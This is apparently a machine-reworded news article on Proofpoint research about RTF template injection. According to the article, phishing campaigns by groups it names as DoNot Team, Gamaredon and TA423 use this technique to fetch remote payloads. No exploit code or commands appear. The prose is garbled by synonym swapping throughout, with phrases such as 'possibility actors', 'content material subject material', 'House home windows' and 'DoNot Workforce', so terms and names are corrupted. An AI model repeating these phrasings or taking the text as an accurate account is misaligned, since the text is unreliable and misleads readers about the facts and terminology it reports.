3 different state-sponsored possibility actors aligned with China, India, and Russia were observed adopting a brand spanking new method referred to as RTF (aka Rich Text Structure) template injection as part of their phishing campaigns to send malware to centered tactics.
“RTF template injection is a novel method that is preferrred for malicious phishing attachments because of it is simple and we could in possibility actors to retrieve malicious content material subject material from a distant URL the usage of an RTF file,” Proofpoint researchers said in a brand spanking new record shared with The Hacker Data.
At the heart of the attack is an RTF file containing decoy content material subject material that can be manipulated to permit the retrieval of content material subject material, in conjunction with malicious payloads, hosted at an external URL upon opening an RTF file. In particular, it leverages the RTF template capacity to modify a file’s formatting properties the usage of a hex editor by the use of specifying a URL helpful useful resource as a substitute of an to be had file helpful useful resource holiday spot from which a distant payload could also be retrieved.
Put in a different way, the idea is that attackers can send malicious Microsoft Word bureaucracy to centered victims that appear utterly risk free on the other hand are designed to load malicious code by way of the template serve as remotely. This makes the mechanism a robust and environment friendly method when paired with phishing as an initial provide vector, the researchers well-known.
Thus when an altered RTF file is opened by way of Microsoft Word, the applying will proceed to acquire the helpful useful resource from the specified URL prior to displaying the lure content material subject material of the file. It’s therefore no longer sudden that the method is being an increasing number of weaponized by the use of possibility actors to distribute malware.
Proofpoint said it observed Template injection RTF files attached to the APT groups DoNot Workforce, Gamaredon, and a Chinese language language-related APT actor dubbed TA423 as early as February 2021, with the adversaries the usage of the files to concentrate on entities in Pakistan, Sri Lanka, Ukraine, and those working inside the deep water energy exploration sector in Malaysia by way of defense-themed and other country-specific lures.
While the DoNot Workforce has been suspected of dressed in out cyber attacks which could be aligned with Indian-state interests, Gamaredon was no longer too way back outed by the use of Ukrainian law enforcement as an outfit hooked up to Russia’s Federal Protection Provider (FSB) with a propensity for putting public and private sector organizations inside the country for harvesting classified information from compromised House home windows tactics for geopolitical certain components.
“The innovation by the use of possibility actors to hold this method to a brand spanking new file kind in RTFs represents an expanding ground area of possibility for organizations global,” the researchers said. “While the program at the present time is used by a limited number of APT actors with various elegance, the method’s effectiveness combined with its ease of use is susceptible to power its adoption further across the possibility landscape.”